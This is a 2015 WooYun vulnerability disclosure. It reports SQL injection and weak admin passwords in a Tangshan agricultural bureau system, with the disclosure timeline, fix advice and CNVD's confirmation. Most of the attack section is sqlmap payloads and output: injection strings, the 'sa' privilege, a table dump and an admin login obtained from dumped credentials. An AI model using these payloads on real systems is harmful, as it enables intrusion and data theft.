当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140881

漏洞标题:唐山市某局某系统高危SQL注入+多部门弱口令漏洞致后台沦陷

相关厂商:唐山市农牧局

漏洞作者: 岛云首席鉴黄师

提交时间:2015-09-15 14:40

修复时间:2015-11-01 15:56

公开时间:2015-11-01 15:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-17: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

公司:我的备案通不过怎么办? 黑帽:2000块钱,包过。

详细说明:

唐山市农牧局农业投入品准入系统

http://**.**.**.**/ApplicationSearch.aspx?type=1


数据库用户是SA权限,又可以--os-shell了呢~

---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=1 AND 5994=5994
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: type=1 AND 5104=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5104=5104) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: type=(SELECT CHAR(113)+CHAR(107)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4677=4677) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: type=1 OR 3921=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
sqlmap resumed the following injection point(s) from stored session:
---


数据表:

---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: TSAA_Application1
[60 tables]
+-------------------------------+
| Application |
| ApplicationStatus |
| Area |
| BusinessField |
| Company |
| CompanyBusinessField |
| CompanyStatus |
| CompanyType |
| Education |
| Log |
| MarketPermission |
| ProcessDocument |
| Producer |
| Product |
| ProductStatus |
| ProductionDocument |
| QualityAssurance |
| QualityTest |
| cms_advs_advscontent |
| cms_advs_advscustomers |
| cms_advs_advshits |
| cms_content_1 |
| cms_content_2 |
| cms_content_3 |
| cms_content_4 |
| cms_content_5 |
| cms_content_6 |
| cms_content_Content |
| cms_content_ContentUpFile |
| cms_log_ContentClickLog |
| cms_model_FormInputLimitType |
| cms_model_FormInputType |
| cms_model_FormInputValue |
| cms_model_FormInputValueType |
| cms_model_Model |
| cms_model_ModelField |
| cms_node_ContentPubType |
| cms_node_Node |
| cms_node_NodeAddionalPub |
| cms_node_NodeContentSort |
| cms_node_NodeGroup |
| cms_node_NodeType |
| cms_oper_log |
| cms_pub_pubTask |
| cms_rec_Recom |
| cms_rec_RecomContent |
| cms_rec_RecomTemplate |
| cms_sys_ContentWorkFlow |
| cms_sys_Log |
| cms_sys_PSN |
| cms_sys_ParamType |
| cms_sys_TimeZone |
| cms_sys_WordReplace |
| cms_user_AdminUsers |
| cms_user_UserBase |
| cms_user_UserPermission |
| cms_vwAllBaseInfo |
| cms_vwCommendAllInfo |
| cms_vwContentBaseInfoForClick |
| cms_vwContentClickLog |
+-------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---


管理表:

Table: cms_user_AdminUsers
[10 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| AddTime | datetime |
| LastLogTime | datetime |
| LogName | nvarchar |
| LogPWD | varchar |
| Name | nvarchar |
| NodeIds | nvarchar |
| PermissionIds | varchar |
| PubCount | int |
| Sex | bit |
| UserBaseId | int |
+---------------+----------+


dump出来的数据

8.jpg


全是弱口令……
用管理员帐号进后台证明一下

9.jpg

漏洞证明:

9.jpg

修复方案:

过滤+不要使用弱口令+隐藏后台+数据库权限最小化

版权声明:转载请注明来源 岛云首席鉴黄师@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-09-17 15:55

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河北分中心,由其后续协调网站管理单位处置。

最新状态:

暂无